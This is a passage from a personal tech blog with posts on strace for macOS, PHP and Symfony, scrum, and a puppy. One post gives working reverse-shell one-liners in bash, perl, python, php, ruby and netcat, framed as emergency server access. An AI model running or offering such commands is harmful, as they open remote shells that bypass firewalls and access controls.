actually do it, but it still strikes me as odd that such an obvious flaw persists in (I'm guessing)
nearly all of them - especially when it would be so easy to fix.

I was amazed and very amused to discover the other day that the powertech smurf amplifier registry
is still online and still reports several broken networks, some with dupes approaching 40.  I
guess some things just don't change.. shit's always gonna be broken.

strace for mac

18 Jun 2015 08:55

strace is really useful on Linux for figuring out why some program isn't doing what it should.

Not sure how many people know this but you can do the same thing on darwin using dtruss, it's just no quite
so obvious.  Using this script:

https://github.com/m4rkw/env/blob/master/bin/strace.bin

with an alias that always run it as sudo:

alias strace="sudo strace"

you can then strace <binary> in exactly the same way that you can on linux.  One significant and mild
annoyance is that it has to run as root, which is why the script contains a bit of sudo hoop-jumping
and exploit mitigation.  It's very handy for watching the call stack when you need to though.

Emergency reverse shell technique

18 Jun 2015 08:44

Don't you just hate it when an emergency happens with an important server and access from your location is
firewalled?  Luckily if there's someone else local to the machine who can execute commands for you, getting
onto it is fairly trivial.

First make sure that the machine you're on can accept connections from the internet on a TCP port (any).
Typically you'll need to map this through on whatever firewall/router you've got on the local network.

Let's say your ip address is 127.127.127.127 and you've mapped tcp port 13131.  Simply listen on the port
with netcat:

$ nc -l 13131

then have someone on the remote machine run any of these:

bash:

bash -i >& /dev/tcp/127.127.127.127/13131 0>&1

perl:

perl -e 'use Socket;$i="127.127.127.127";$p=13131;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.127.127.127",13131));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

php:

php -r '$sock=fsockopen("127.127.127.127",13131);exec("/bin/bash -i <&3 >&3 2>&3");'

ruby:

ruby -rsocket -e'f=TCPSocket.open("127.127.127.127",13131).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'

netcat:

nc -e /bin/bash 127.127.127.127 13131

and hey presto, your netcat listener is now connected to the shell. Of course the connection isn't
encrypted, so you'll want to be careful what you type over it, but for emergency use it's quite handy. The
advantage over the obvious choice for this (ssh) is that you don't have to give the person who's at the
server end any credentials to log into your machine with in order to set up the connection.

source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

<strong>Update</strong>

One limitation of this is that you won't have a tty, which makes many things impossile or difficult.

However if expect is installed you can get one by dropping this into a file and running it:

#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn bash
interact

then you have a full tty and can run sudo, su, screen etc :)

Symfony 2 is kind of ok

18 Jun 2015 08:04

As PHP frameworks go, Symfony 2 isn't entirely terrible.  Before this project it had been a while since I used Symfony, and back then it was still on
version 1.something.  These days it's kinda cool, allows easy use of popular design patterns and doctrine works reasonably well.

There are some things I find frustrating though, often you spend more time messing around with the YAML definitions of entities
than it would take to simply write a create statement in SQL.  There are times when it's really handy though, for instance our
project hasn't had it's first release yet so we can simply doctrine:migrations:diff to regenerate the base migration completely
automatically from the YAML definitions.  This is really cool - I worked on a Yii project for years where this was an entirely
manual process.

I'm not really a fan of writing getters and setters on PHP models, I understand why some people argue it's good practice and
Symfony kind of makes you do it, but it still feels like a lot of busywork.  In fact that's my biggest complaint about Symfony -
for all the niceties and abstracted stuff it gives you, you still end up doing a lot of pointless typing.  And I really REALLY
hate annotations.  Whoever decided that text in a comment should affect how something works ought to be shot for the good of
mankind.

Symfony 2 is one of the best turd-polishing efforts I've experienced.  In the context of PHP development it's a very nicely
polished turd and one of the least painful frameworks to get things done with.  But no matter how much you polish a turd, it's
still a turd and PHP is a fucking turd.

PHP just sucks and there's no getting around it

15 Jun 2015 11:12

There are many reasons why PHP is a shit programming language, many of which are discussed at length in this article:

http://eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design/

But the main thing that bugs me is how inelegant it is.  You can get things done with it sure, and you can do good work in
almost any language, but that doesn't mean other languages aren't inherently nicer.  Take for example my "usify" script which
I use to automatically derive use statements for Symfony2 classes.  This is the PHP version:

https://github.com/m4rkw/env/blob/master/bin/usify.bak">https://github.com/m4rkw/env/blob/master/bin/usify.bak

And here is the ruby rewrite:

https://github.com/m4rkw/env/blob/master/bin/usify

I haven't even refactored it to really take advantage of ruby's features yet and it's still 76 lines shorter after a straight rewrite, and the code is much cleaner, easier to read
and more expressive.  PHP just feels like you're constantly kicking a dead whale along a beach.

It seems that the old adage holds true - "If you could reason with PHP developers there wouldn't BE any PHP developers."

Why agile and especially scrum are terrible

15 Jun 2015 08:20

This is an awesome article:

https://michaelochurch.wordpress.com/2015/06/06/why-agile-and-especially-scrum-are-terrible/

I've been in this situation before when "agile" processes were strewn like cancer throughout a project I really cared about like, with
depressing results.  As with any system of processes it's not the process itself that's inerently toxic, but the way it's implemented.
I think it's possible to use scrum as a tool for oversight without demoralising talented developers, it just seems rare that it's done
well.

I strongly suspect that in many cases scrum is promoted as a way to justify certain expensive management roles that would otherwise simply not
need to exist in an engineer-driven culture.

How the hell did dogs survive the evolutionary race?

14 Jun 2015 20:57

I really can't figure it out.  Our 3-month old miniature schnauzer will eat literally anything she finds on the ground.  How that offers some kind
of evolutionary advantage I'll never know.  I guess when they were evolving there was a lot less man-made rubbish lying around on the ground, but still you'd
expect at least *some* attempt to be careful.  I know apes are careful - the first time they try a new food they place it slowly in their mouth and then
pause for a moment to decide whether to eat it or spit it out.  Our little Poppy would merrily chomp down on whatever she finds lying around on the street
if we gave her the chance.

She is cute though :)

https://m4.rkw.io/img/IMG_1052_2.JPG